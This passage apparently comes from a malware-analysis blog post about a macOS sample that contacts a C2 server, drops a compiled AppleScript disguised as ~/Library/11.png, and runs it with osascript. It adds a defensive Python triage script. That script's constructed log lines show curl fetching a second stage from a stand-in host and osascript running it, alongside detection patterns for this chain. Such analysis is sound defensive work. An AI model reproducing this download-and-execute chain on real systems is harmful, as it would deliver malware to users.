From the Overview Tab, we can see the main behaviors of the sample: network connectivity, file dropping, and system information gathering. Now we can dig deeper into each of these characteristics.

The Network Tab shows multiple C2 connections. The first request, to budaybu100001com:8080, returns the second-stage URL embedded in the response, using the string “-=-=-=” as a marker. Interestingly, two URLs were returned; the second one might be a fallback or be used by another variant of the family.

The second stage is another compiled AppleScript, stored at ~/Library/11.png. It is again executed using “osascript” and has two main tasks: All downloads are performed using curl, which is clearly visible in the Behavior Tab.
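To turn the observations above into something reusable, here is an added example (my own code, not the blog's or the sample's) that does two things an analyst typically wants after reading a report like this: extract the marker-delimited URL(s) from a captured first-stage response, treating the first as primary and any further ones as fallbacks, and triage sandbox behaviour lines for the chain described (curl downloads, then osascript executing a file with a non-script extension). The exact layout of the response (URLs sitting between pairs of "-=-=-=" markers) is an assumption, since the post only says the marker is used; the log lines and the `.invalid` second-stage hostname are constructed, and the first-stage host is copied as written in the post.

```python
import re
from typing import NamedTuple

MARKER = "-=-=-="  # delimiter the post describes in the first-stage C2 response
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Payloads dropped with a benign-looking extension (the post's second stage is ~/Library/11.png)
DISGUISE_EXT = (".png", ".jpg", ".gif", ".txt")


def extract_marked_urls(body: str) -> list[str]:
    """Return URLs found in segments enclosed by MARKER on both sides.

    Assumed layout: MARKER url MARKER [url MARKER ...]. Text outside a marker pair
    (HTTP noise, HTML) is ignored, so a stray 'http://' in a banner is not picked up.
    """
    segments = body.split(MARKER)
    urls: list[str] = []
    for seg in segments[1:-1]:  # only segments bounded by a marker on each side
        urls.extend(URL_RE.findall(seg))
    return urls


def stage_urls(body: str) -> dict:
    """Classify the marked URLs: first is primary, the rest are fallbacks."""
    urls = extract_marked_urls(body)
    return {"primary": urls[0] if urls else None, "fallbacks": urls[1:]}


class Event(NamedTuple):
    proc: str
    args: str


def parse_behavior_line(line: str) -> Event:
    """Constructed log format: '<process> <arguments...>' per line."""
    parts = line.strip().split(maxsplit=1)
    return Event(parts[0], parts[1] if len(parts) > 1 else "")


def flag_event(e: Event) -> list[str]:
    """Findings for one process event, matching the chain in the post."""
    findings: list[str] = []
    if e.proc == "osascript":
        target = e.args.split()[-1] if e.args else ""
        if target.lower().endswith(DISGUISE_EXT):
            findings.append(f"osascript executing non-script file {target}")
    elif e.proc == "curl":
        for url in URL_RE.findall(e.args):
            findings.append(f"curl download from {url}")
    return findings


def triage(lines: list[str]) -> list[str]:
    findings: list[str] = []
    for line in lines:
        findings.extend(flag_event(parse_behavior_line(line)))
    return findings


# Constructed sandbox behaviour lines mirroring the chain described in the post.
SAMPLE_LOG = [
    "osascript /tmp/sample.scpt",
    "curl -s http://budaybu100001com:8080/stage",
    "curl -o ~/Library/11.png http://second-stage.invalid/11.png",
    "osascript ~/Library/11.png",
    "uname -a",
]

# Constructed first-stage response with a primary and a fallback URL.
SAMPLE_RESPONSE = (
    "OK\n"
    "-=-=-=http://second-stage.invalid/11.png-=-=-=http://fallback.invalid/11.png-=-=-=\n"
)

if __name__ == "__main__":
    print(stage_urls(SAMPLE_RESPONSE))
    for f in triage(SAMPLE_LOG):
        print("[!]", f)
```

The osascript check deliberately keys on the extension rather than the path: a compiled AppleScript run from any location under an image extension is worth a look, and the curl findings give the analyst the download sources to pivot on in the Network Tab.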